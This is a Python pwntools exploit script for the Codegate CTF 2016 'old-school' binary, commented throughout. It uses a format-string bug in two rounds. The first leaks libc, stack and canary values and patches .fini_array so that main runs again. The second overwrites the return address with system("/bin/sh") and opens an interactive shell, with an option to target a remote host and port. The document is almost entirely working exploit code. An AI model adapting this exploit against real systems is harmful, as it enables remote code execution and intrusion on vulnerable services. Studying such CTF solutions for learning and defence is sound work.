#!/usr/bin/env python2
# Codegate CTF 2016 : old-school
# https://github.com/ctfs/write-ups-2016/tree/master/codegate-ctf-2016/pwn/old-school
#
# Two-round format-string exploit against ./oldschool (32-bit, pwntools):
#   round 1 leaks a libc pointer, a stack pointer and the canary, and writes
#           main's address into .fini_array so main is entered once more at
#           exit;
#   round 2 overwrites that second frame's return address with
#           system("/bin/sh") via pwntools' fmtstr_payload.
from pwn import * | |
import sys | |
# Probe run: the 7th %p prints 0x41414141 ("AAAA"), so the input buffer
# starts at printf argument 7 (fsb_offset_buffer below).
# $ ./oldschool
# YOUR INPUT :AAAA%p.%p.%p.%p.%p.%p.%p.%p.%p
# RESPONSE :AAAA0x3fc.0xf7733580.0x4.0x4.0x6474e550.0x16fba4.0x41414141.0x252e7025.0x70252e70
#
# Stack dump from gdb (ASLR is off under gdb, so these addresses are the
# unrandomised ones; the breakpoint sits in main and the buffer pointer at
# esp suggests this is the printf call).  The slot offsets below are the
# word distances from the buffer (0xffffcbdc) to the other marked cells.
# Breakpoint 1, 0x08048516 in main ()
# $ebp = 0xffffcfe8
# gdb-peda$ x/300xw $esp
# 0xffffcbc0: 0xffffcbdc 0x000003fc 0xf7f95580 0x00000004
# 0xffffcbd0: 0x00000004 0x6474e550 0x0016fba4 0x41414141
# 0xffffcbe0: 0x0000000a 0x00000000 0x00000000 0x00000000
# ...
# 0xffffcfc0: 0x00000000 0x00000000 0x00000000 0x00000000
# 0xffffcfd0: 0x00000000 0x00000000 0x00000000 0xf96f1900 <- canary
# 0xffffcfe0: 0xffffd000 <- pop ecx 0xf7f95000 <- pop edi 0x00000000 <- pop ebp 0xf7df1366 <- ret
# 0xffffcff0: 0x00000001 0xf7f95000 0x00000000 0xf7df1366
# ...
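# Format-string argument indices, derived from the gdb dump above: the 7th
# %p printed 0x41414141, so the input buffer is argument 7, and every other
# slot is (cell address - buffer address) / 4 arguments away from it.
# Floor division keeps the indices ints under Python 3 as well; a float
# would render as e.g. '%2.0$08x' and silently break the format string.
fsb_offset_buffer = 7
fsb_offset_stdin = fsb_offset_buffer + ((0xffffcbc8 - 0xffffcbdc) // 4)   # _IO_2_1_stdin_ pointer
fsb_offset_canary = fsb_offset_buffer + ((0xffffcfdc - 0xffffcbdc) // 4)  # stack canary
fsb_offset_stack = fsb_offset_buffer + ((0xffffcfe0 - 0xffffcbdc) // 4)   # saved stack pointer (pop ecx slot)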
# Binary addresses, read with `r2 -A oldschool` (`iS~fini_array`,
# `f~sym.main`).  They are used as-is, so the binary is taken to be non-PIE.
#   .fini_array  idx=19 vaddr=0x080496dc paddr=0x000006dc sz=4 vsz=4 perm=--rw-
#   sym.main     0x0804849b (163 bytes)
addr_fini_array, addr_main = 0x080496dc, 0x0804849b

# libc symbol offsets, read from the local /usr/lib32/libc-2.25.so with
# `f~obj._IO_2_1_stdin_,sym.system,str._bin_sh`.  They only match a target
# that runs that exact libc build; re-resolve them for any other libc.
#   obj._IO_2_1_stdin_  0x001bc580 (152 bytes)
#   sym.system          0x0003c290 (55 bytes)
#   str._bin_sh         0x00166508 (8 bytes)
offset_libc_stdin = 0x001bc580
offset_libc_system = 0x0003c290
offset_libc_bin_sh = 0x00166508
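context(os='linux', arch='i386')

# Target selection: `./exploit.py` runs the local binary, `./exploit.py remote
# HOST PORT` talks to a network service.  A missing host/port fails here with
# a usage message instead of leaving `r` unset and crashing at the first
# sendline further down.
if 'remote' in sys.argv:
    i = sys.argv.index('remote')
    if len(sys.argv) < i + 3:
        sys.exit('usage: {} remote HOST PORT'.format(sys.argv[0]))
    r = remote(sys.argv[i + 1], int(sys.argv[i + 2]))
else:
    r = process('./oldschool')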
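log.info('leak informations and overwrite .fini_array')

# Round 1 payload.  Two %hn writes patch .fini_array with main's address
# 16 bits at a time: argument 7 (the first p32) receives the low half and
# argument 8 (the second p32) the high half.  %hn stores the number of
# characters printed so far, so each write is preceded by a %<width>x that
# pads the output count up to the wanted value (mod 0x10000).  The padding
# must be at least as wide as the argument that %x consumes (8 chars for a
# 32-bit pointer) or the count overshoots; that holds for this addr_main but
# needs re-checking for other targets.
main_lo, main_hi = addr_main & 0xffff, addr_main >> 16
buf = ''
buf += p32(addr_fini_array)
buf += p32(addr_fini_array + 2)
buf += '%{}x'.format(main_lo - len(buf))
buf += '%{}$hn'.format(fsb_offset_buffer)
# Move the count from main_lo to main_hi modulo 2**16.  Works whichever half
# is larger (the original form assumed low > high) and emits no padding when
# the two halves already agree.
pad = (main_hi - main_lo) % 0x10000
if pad:
    buf += '%{}x'.format(pad)
buf += '%{}$hn'.format(fsb_offset_buffer + 1)
# Leaks: three fields of exactly 8 hex digits, followed by a marker to recv
# up to.
buf += '%{}$08x'.format(fsb_offset_stdin)
buf += '%{}$08x'.format(fsb_offset_stack)
buf += '%{}$08x'.format(fsb_offset_canary)
buf += 'nyan'
r.sendline(buf)

# The three leaks are the 24 characters right before 'nyan'.
leak = r.recvuntil('nyan')
addr_libc_base = int(leak[-28:-20], 16) - offset_libc_stdin  # _IO_2_1_stdin_ -> libc base
addr_stack = int(leak[-20:-12], 16)
canary = int(leak[-12:-4], 16)  # logged only; nothing below writes over it
log.success('canary: 0x{:x}'.format(canary))
log.success('stack: 0x{:x}'.format(addr_stack))
log.success('libc base: 0x{:x}'.format(addr_libc_base))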
log.info('overwrite return address')

# Round 2: main is presumably entered again through the patched .fini_array,
# so the leaked stack pointer is rebased by 0xe4 to reach that frame's saved
# return address (an offset evidently measured for this binary; re-check it
# if the binary or libc changes).  Conventional ret2libc layout from there:
# [system][<slot +4 left as-is: system's own return address>][ptr "/bin/sh"].
ret_slot = addr_stack - 0xe4
addr_system = addr_libc_base + offset_libc_system
addr_bin_sh = addr_libc_base + offset_libc_bin_sh
writes = {
    ret_slot: addr_system,
    ret_slot + 8: addr_bin_sh,
}
r.sendline(fmtstr_payload(fsb_offset_buffer, writes))
r.clean()
r.interactive()